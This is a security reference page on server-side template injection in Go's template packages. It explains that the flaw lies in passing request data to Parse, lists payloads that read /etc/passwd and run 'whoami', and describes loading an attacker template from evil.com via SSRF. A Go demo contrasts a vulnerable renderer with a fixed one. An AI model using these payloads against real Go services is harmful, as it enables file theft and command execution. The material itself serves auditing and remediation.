Go SSTI

Go's html/template (and text/template) is vulnerable to SSTI (Server Side Template Injection) when user-controlled input is parsed as the template itself rather than passed to the template as data.

- [go-ssti-method-research](https://www.onsecurity.io/blog/go-ssti-method-research/)

Investigation

import "html/template"

...

// Vulnerable only if the string given to Parse comes from the request
// (query parameter, form field, uploaded or fetched file): that string
// *is* the template, so any {{ }} actions in it are compiled and run.
template.New("foo").Parse("{{ . }}")

If a website uses a web framework written in Go and the html/template (or text/template) package to parse a template file or string that we control, we can inject our own template actions. The injection point is Parse/ParseFiles/ParseGlob, not Execute: input passed to Execute as data is only a value, and html/template HTML-escapes it on output, whereas input passed to Parse is compiled as template code. html/template's contextual escaping protects the rendered output; it does nothing to stop injected actions from executing. When auditing, look for Parse calls whose argument is not a string constant, e.g. built with fmt.Sprintf or string concatenation from request data.


Exploit

Assume the web application passes a Page struct to Execute (so it becomes `.` inside the template) with a User field and two exported methods, GetFile and ExecuteCmd. Every exported field and method reachable from `.` can be referenced from a template; a method must return one value, or a value and an error, to be callable from an action.

// `main.go` of target website

type User struct {
    Id   string
    Name string
}

// Page is the value passed to Execute; it is `.` inside the template.
type Page struct {
    User User
}

// Read contents of the file and return it.
func (p Page) GetFile(filepath string) (string, error) {
    ...
}

// Execute system command and return its output.
func (p Page) ExecuteCmd(cmd string) (string, error) {
    ...
}

Payloads

# Dump `.`, the value passed to Execute.
{{ . }}

# Get the `User` struct values.
{{ .User }}

# Call the `GetFile` method to LFI.
{{ .GetFile "/etc/passwd" }}

# Call the `ExecuteCmd` method to RCE.
{{ .ExecuteCmd "whoami" }}

Because html/template escapes output contextually, returned data shows up HTML-encoded (`"` as `&#34;`, `<` as `&lt;`), so check the raw response rather than the rendered page. A method that returns a non-nil error aborts execution, which usually surfaces as a server error instead of output.

The same applies when the template text is fetched rather than typed into a parameter: if the website loads a template from a user-supplied path or URL, e.g. via SSRF (https://example.com/?file=http://evil.com/template), an attacker-hosted file containing the payloads above is parsed by the website and leads to SSTI.
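The following is an added, self-contained example (not code from the original page or from any real target) that ties the Investigation pattern and the Exploit payloads together. It defines a hypothetical Page type with the User field and the GetFile/ExecuteCmd methods assumed above, shows RenderVulnerable, where the request string is handed to Parse, beside RenderSafe, where the same string is passed to Execute as data, and demonstrates that the page's payloads execute in the first case and come out as inert, HTML-escaped text in the second.

```go
package main

import (
	"bytes"
	"fmt"
	"html/template"
	"os"
	"os/exec"
)

// Hypothetical types mirroring the page's scenario (assumed, not a real target's code).
// Page is what the handler passes to Execute, so it becomes `.` inside the
// template; every exported field and method on it is reachable from {{ }}.
type User struct {
	Id   string
	Name string
}

type Page struct {
	User User
}

// GetFile reads a file and returns its contents: {{ .GetFile "/etc/passwd" }}.
// Template methods must return one value, or a value plus an error.
func (p Page) GetFile(path string) (string, error) {
	data, err := os.ReadFile(path)
	return string(data), err
}

// ExecuteCmd runs a shell command and returns its output: {{ .ExecuteCmd "whoami" }}.
func (p Page) ExecuteCmd(cmd string) (string, error) {
	out, err := exec.Command("sh", "-c", cmd).CombinedOutput()
	return string(out), err
}

// RenderVulnerable is the injectable pattern: request-controlled text is passed
// to Parse, so any {{ }} actions it contains are compiled and executed.
func RenderVulnerable(userInput string, page Page) (string, error) {
	tmpl, err := template.New("page").Parse(userInput)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := tmpl.Execute(&buf, page); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// RenderSafe is the fixed pattern: the template text is a constant and the
// request-controlled string is only data, so a payload is inert text that
// html/template additionally HTML-escapes on output.
func RenderSafe(userInput string, page Page) (string, error) {
	const src = `<p>Hello {{ .User.Name }}, you said: {{ .Input }}</p>`
	tmpl, err := template.New("page").Parse(src)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	err = tmpl.Execute(&buf, struct {
		User  User
		Input string
	}{page.User, userInput})
	return buf.String(), err
}

func main() {
	page := Page{User: User{Id: "u1", Name: "alice"}}
	payloads := []string{
		`{{ . }}`,
		`{{ .User }}`,
		`{{ .GetFile "/etc/passwd" }}`,
		`{{ .ExecuteCmd "whoami" }}`,
	}
	for _, p := range payloads {
		out, err := RenderVulnerable(p, page)
		fmt.Printf("vulnerable %-32s -> %q err=%v\n", p, out, err)
	}
	out, _ := RenderSafe(`{{ .ExecuteCmd "whoami" }}`, page)
	fmt.Printf("safe -> %s\n", out)
}
```

Run it with `go run main.go`: the vulnerable renderer returns the User struct, the file contents and the command output, while the safe renderer prints the payload literally with its quotes encoded as `&#34;`. The difference is entirely in which argument the request data reaches, Parse or Execute.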